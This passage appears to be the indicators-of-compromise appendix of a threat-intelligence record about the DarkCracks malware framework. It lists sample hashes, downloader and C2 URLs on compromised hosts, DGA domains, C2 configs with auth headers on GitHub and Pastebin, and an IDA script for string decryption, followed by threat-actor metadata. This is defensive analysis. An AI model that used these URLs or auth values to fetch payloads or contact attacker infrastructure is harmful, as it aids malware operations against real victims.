*mY5bJK7e-x64-musl.decrypted\r\nd41c379725973e97ef9cbafb1efdb2f3 *mY5bJK7e-x86\r\n1d407ff91ce19afc82f7946c3ec24dea *mY5bJK7e-x86.decrypted\r\na1f3e574799c3f874a8d3563dbc55f4c *se3hf6jwc-armv5-uclibc\r\nad831d9c00c90fead925f4575f4a6a9a *se3hf6jwc-armv5-uclibc.decrypted\r\n2b5df28714421d79ab3e63eac538d853 *se3hf6jwc-armv6-gnu\r\n2107625e9980d190e3214ef09a83608f *se3hf6jwc-armv6-gnu.decrypted\r\n35f846e24d0cccb5a3ec736c07f6a0a2 *se3hf6jwc-armv8-gnu\r\n5fbe460fc8fa09dc6adc73e5e908cd0e *se3hf6jwc-armv8-gnu.decrypted\r\n27f18a27942fbb71c4e84736db45b5cf *se3hf6jwc-mips-uclibc\r\ne1674821a190f5250e6aba40916c9061 *se3hf6jwc-mips-uclibc.decrypted\r\nb1040f3193d4bec01b13bc73ecaa2587 *se3hf6jwc-mipsel-uclibc\r\n7c33c052c5d451ba4069639286dfc4b5 *se3hf6jwc-mipsel-uclibc.decrypted\r\n81eccc9c10368aa54cfed371f83da45a *se3hf6jwc-x64\r\nfe5f484f71bf0fd7afa56e60da7eec6f *se3hf6jwc-x64.decrypted\r\n08169e20daaad052075bd4026c8e287f *se3hf6jwc-x64-musl\r\n2caf09452e79390f09bebf27dad9acf4 *se3hf6jwc-x64-musl.decrypted\r\n5421bc92f2dd8f37538c2023c1e2f8ee *se3hf6jwc-x86\r\n7168f47f067d260c34543e32a7a55cbd *se3hf6jwc-x86.decrypted\r\nConfig\r\n4e52426a96baf84431775adf2d6f0ae2 *j8UgL3v\r\n4a642a86a8d8e71e5f163fa54eda9241 *qoakeifm-unknown.txt\r\nDownloader\r\nhttps://www.auntyaliceschool.site/wp-admin/maint/{se3hf6jwc|wk8dnj2k}\r\nhttp://179.191.68.85:82/vendor/sebastian/diff/src/Exception/{mY5bJK7e|pQ1iM9hd}\r\nhttp://45.169.87.67/vendor/sabre/event/lib/Promise/{se3hf6jwc|wk8dnj2k}\r\nC2 (Victims)\r\n
http://187.190.1.137/vendor/guzzlehttp/guzzle/src/Exception/detail.php\r\nhttp://204.199.192.44/vendor/paragonie/sodium_compat/src/Core32/Poly25519.php\r\nhttp://148.102.51.6/vendor/guzzlehttp/guzzle/src/Handler/CurlSingleHandler.php\r\nhttp://158.177.2.191/vendor/guzzlehttp/guzzle/src/Handler/CurlSingleHandler.php\r\nhttp://64.227.0.146/vendor/guzzlehttp/guzzle/src/Handler/CurlSingleHandler.php\r\nhttp://216.238.103.62:8013/vendor/guzzlehttp/guzzle/src/Exception/DNSException.php\r\nhttp://52.0.85.62/vendor/guzzlehttp/guzzle/src/Exception/detail.php\r\nhttps://www.miracles.com.hk/wp-content/plugins/foxiplugin/detail.php\r\nhttp://152.67.11.54/wordpress//wp-admin/includes/sus.php\r\nDGA C2\r\n202301-202312\r\nkTD7YgOAgjL.com\r\ngTD7YgOAgjL.com\r\nsTD7YgOAgjL.com\r\nEVD7YgOAgjL.com\r\nAVD7YgOAgjL.com\r\nMVD7YgOAgjL.com\r\nIVD7YgOAgjL.com\r\nUVD7YgOAgjL.com\r\nQVD7YgOAgjL.com\r\nYTC7YgOAgjL.com\r\nkTC7YgOAgjL.com\r\ngTC7YgOAgjL.com\r\n202401-202408\r\nkTDFUgOAgjL.com\r\ngTDFUgOAgjL.com\r\nsTDFUgOAgjL.com\r\nEVDFUgOAgjL.com\r\nAVDFUgOAgjL.com\r\nMVDFUgOAgjL.com\r\nIVDFUgOAgjL.com\r\nUVDFUgOAgjL.com\r\nC2\r\n216.74.123.97 United States|California|Los Angeles AS834|IPXO LLC\r\n213.139.233.163 Japan|Osaka|Osaka AS34985|ASN block not managed by the RIPE NCC\r\nConfigs\r\nGithub\r\nAddress: 
https://github[.]com/adrhpbrn29/sudoku1\r\n{\"url\":\"http://148.102.51.6/vendor/guzzlehttp/guzzle/src/Handler/CurlSingleHandler.php\",\"authHeader\":\"LJHRQWE\",\"\r\n{\"url\":\"http://148.102.51.6/vendor/guzzlehttp/guzzle/src/Handler/CurlSingleHandler.php\",\"authHeader\":\"LJHRQWE\",\"\r\n{\"url\":\"http://148.102.51.6/vendor/guzzlehttp/guzzle/src/Handler/CurlSingleHandler.php\",\"authHeader\":\"LJHRQWE\"}\r\n{\"url\":\"http://158.177.2.191/vendor/guzzlehttp/guzzle/src/Handler/CurlSingleHandler.php\",\"authHeader\":\"SLDJKFA\"}\r\n{\"url\":\"http://64.227.0.146/vendor/guzzlehttp/guzzle/src/Handler/CurlSingleHandler.php\",\"authHeader\":\"Linux Max\"\r\n{\"url\":\"http://216.238.103.62:8013/vendor/guzzlehttp/guzzle/src/Exception/DNSException.php\",\"authHeader\":\"Rbz021\r\nPastebin\r\nAddress: https://pastebin[.]com/GYEBVyMR\r\n{\"url\":\"http://52.0.85.62/vendor/guzzlehttp/guzzle/src/Exception/detail.php\",\"authHeader\":\"GGSEDPHP\",\"clientUrl\"\r\nAppendix\r\nIDA Script\r\n# Install flare_emu first\r\n# Only tested with 93a7cba1edbacb633021ebc38c10a79f\r\n# Modify 'decstr_addr' for your case\r\nimport base64\r\nimport string\r\nimport flare_emu\r\nimport ida_bytes\r\nimport ida_segment\r\n\r\n# XOR key used by the string decryption routine (\"Crackalackin'\")\r\nkey = bytes.fromhex('43 72 61 63 6B 61 6C 61 63 6B 69 6E 27')\r\n\r\ndef decode(cipher):\r\n    # Reverse the stored string, pad it to a multiple of 4 and base64-decode it\r\n    tmp = cipher[::-1] + b\"=\" * ((4 - len(cipher) % 4) % 4)\r\n    out = bytearray()\r\n    for i, v in enumerate(base64.urlsafe_b64decode(tmp)):\r\n        cha = v ^ key[i % len(key)]\r\n        # Swap the case of ASCII letters before the second base64 pass\r\n        if chr(cha) in string.ascii_letters:\r\n            cha ^= 0x20\r\n        out.append(cha)\r\n    out += b\"=\" * ((4 - len(out) % 4) % 4)\r\n    return base64.urlsafe_b64decode(out)\r\n\r\ndef iterateCallback(eh, address, argv, userData):\r\n    # Only handle call sites whose first argument points into .rodata\r\n    ro = ida_segment.get_segm_by_name(\".rodata\")\r\n    if ro.start_ea \u003c= argv[0] \u003c= ro.end_ea:\r\n        buff = eh.getEmuString(argv[0])\r\n        if len(buff) \u003e 0:\r\n            plain = decode(buff)\r\n            print(hex(argv[0]), buff, \"\u003c==============\u003e\", plain)\r\n            # Overwrite the encrypted string in the IDB with its plaintext\r\n            
ida_bytes.put_bytes(argv[0], b'\\x00' * len(buff))\r\n            ida_bytes.put_bytes(argv[0], plain)\r\n\r\ndecstr_addr = 0x0000FCD0\r\neh = flare_emu.EmuHelper()\r\neh.iterate(decstr_addr, iterateCallback)\r\nCyberChef\r\nhttps://gchq.github.io/CyberChef/#recipe=AES_Decrypt(%7B'option':'Hex','string':'2D%208C%207F%20EE%2042%20D3%20\r\nSource: https://blog.xlab.qianxin.com/darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.xlab.qianxin.com/darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework/"
	],
	"report_names": [
		"darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework"
	],
	"threat_actors": [
		{
			"id": "5d2bd376-fcdc-4c6a-bc2c-17ebbb5b81a4",
			"created_at": "2022-10-25T16:07:23.667223Z",
			"updated_at": "2026-04-10T02:00:04.705778Z",
			"deleted_at": null,
			"main_name": "GCHQ",
			"aliases": [
				"Government Communications Headquarters",
				"Operation Socialist"
			],
			"source_name": "ETDA:GCHQ",
			"tools": [
				"Prax",
				"Regin",
				"WarriorPride"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "68cc6e37-f16d-4995-a75b-5e8e2a6cbb3d",
			"created_at": "2024-05-01T02:03:07.943593Z",
			"updated_at": "2026-04-10T02:00:03.795229Z",
			"deleted_at": null,
			"main_name": "BRONZE EDISON",
			"aliases": [
				"APT4 ",
				"DarkSeoul",
				"Maverick Panda ",
				"Salmon Typhoon ",
				"Sodium ",
				"Sykipot ",
				"TG-0623 ",
				"getkys"
			],
			"source_name": "Secureworks:BRONZE EDISON",
			"tools": [
				"Gh0st RAT",
				"Wkysol",
				"ZxPortMap"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "d4ac28d1-66eb-4f2d-9f9b-a72394349fd0",
			"created_at": "2023-01-06T13:46:38.667954Z",
			"updated_at": "2026-04-10T02:00:03.061447Z",
			"deleted_at": null,
			"main_name": "APT4",
			"aliases": [
				"PLA Navy",
				"MAVERICK PANDA",
				"BRONZE EDISON",
				"SODIUM",
				"Salmon Typhoon"
			],
			"source_name": "MISPGALAXY:APT4",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6fbff48b-7a3e-4e54-ac22-b10f11e32337",
			"created_at": "2022-10-25T16:07:23.318008Z",
			"updated_at": "2026-04-10T02:00:04.539063Z",
			"deleted_at": null,
			"main_name": "APT 4",
			"aliases": [
				"APT 4",
				"Bronze Edison",
				"Maverick Panda",
				"Salmon Typhoo",
				"Sodium",
				"Sykipot",
				"TG-0623",
				"Wisp Team"
			],
			"source_name": "ETDA:APT 4",
			"tools": [
				"Getkys",
				"Sykipot",
				"Wkysol",
				"XMRig"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434708,
	"ts_updated_at": 1775826725,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8f5cd75afa28ad746878a11cc39117822e9caeaa.pdf",
		"text": "https://archive.orkl.eu/8f5cd75afa28ad746878a11cc39117822e9caeaa.txt",
		"img": "https://archive.orkl.eu/8f5cd75afa28ad746878a11cc39117822e9caeaa.jpg"
	}
}